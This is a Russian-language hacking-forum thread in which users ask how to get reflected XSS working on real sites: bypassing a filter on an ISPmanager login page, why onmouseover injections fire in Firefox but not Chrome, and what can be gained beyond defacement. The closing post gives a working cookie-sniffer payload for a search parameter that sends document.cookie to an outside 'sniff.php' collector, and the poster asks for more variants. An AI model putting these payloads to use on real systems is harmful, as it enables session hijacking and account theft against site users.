ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Я когда вставляю код в адресную строку, у меня оно срабатывает в поиске, но не как скрипт(( что делать?

второй раз вставляю пост если удаляете пишите пожалуйста почему? Имеется сайт,запрос вида: site/manager?alert(/x/); выкидывает меня на страницу вида https://site/manager/?alert(/x/);?alert(/x/); Там находится страница авторизации isp manager,НО запрос вида: site/manager/?'/

выдаёт пустую страницу,но код этой страницы таков:

Насколько я понимаю, здесь соит фильтр ,который не даёт мне использовать символы ??? если мне удасться,обойти фильтрацию перекодировкой например,возможна ли здесь пассивная XSS???

...если копирую содержимое страницы на жёсткий, и там правлю, то понятное дело всё получается но как только ссылается на сайтик так лажа... что то я совсем запутался выручайте

xss

Вот другая ситуация есть уязвимость в форме поиска, можно испольщзовать onmouseover= и хтмл код, ява отказывается исполняться... ...У меня два вопроса, почему не хочет исполняться ява скрипт в форме или без неё и что кроме псевдо дефейса вообще возможно выжать из этого? может быть линк на тему где ИМЕННО ЭТИ вопросы обсуждены?..

Вот новая Ремарочка... ява работает в мозиле, однако отказывается в хроме и отключается в ишаке... мои два вопроса всё же актуальны,прошу подсказать

Вот простой для вас вопрос я думаю...

site/search/?q=" onmouseover=prompt(3333) />document.write(document.cookie);bad=
[/HTML]

нашёл решение для снифера, работает исключительно так:

[HTML]
HTML:
www.victim.ru/search/?q=" onmouseover=/>img=new Image ();img.src="http://sniff/sniff.php?cookie="%2Bdocument.cookiebad=(( может кто-нибудь подскажет ,другие варианты?